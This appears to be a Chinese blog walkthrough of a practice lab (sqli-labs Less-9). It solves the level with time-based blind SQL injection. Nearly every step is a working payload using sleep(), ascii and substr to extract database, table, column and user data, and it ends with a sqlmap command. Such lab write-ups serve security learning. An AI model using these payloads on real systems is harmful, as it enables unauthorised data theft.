一、(先抛去本关的提示来思考怎么解)在输入id以及更换闭合符号后,发现并不会有回显或者报错,然后再输入and 1=2 后,也没有变化。所以最后只能使用延时注入
二、构造简单的payload来判断闭合符号,如果闭合正确的话会延迟五秒,闭合不正确则不会有延迟,以此来判断这关是单引号闭合
?id=1' and if(length(database())>0,sleep(5),1)--+
三、判断数据库数量,判断正确的话会延迟五秒刷新,因为页面没有变化就不截图了
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(schema_name) from information_schema.schemata)=6,sleep(5),1)--+
四、逐个逐位爆破数据名
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1)--+
五、判断某数据库表数量
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)--+
六、逐个逐位爆破表名
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>50,sleep(5),1)--+
七、判断某表列数
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where table_name='users')>5,sleep(5),1)--+
八、逐个逐位爆破列名
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>50,sleep(5),1)--+
九、判断数据数量
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(password) from users)=17,sleep(5),1)--+
十、逐个逐位爆数据
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(1),1)--+
==================================================================================================================================================================================================================================================================
sqlmap爆破users表的全部列
python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-9/?id=1" -batch -dbms mysql -D security -T users -columns
over~
865
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
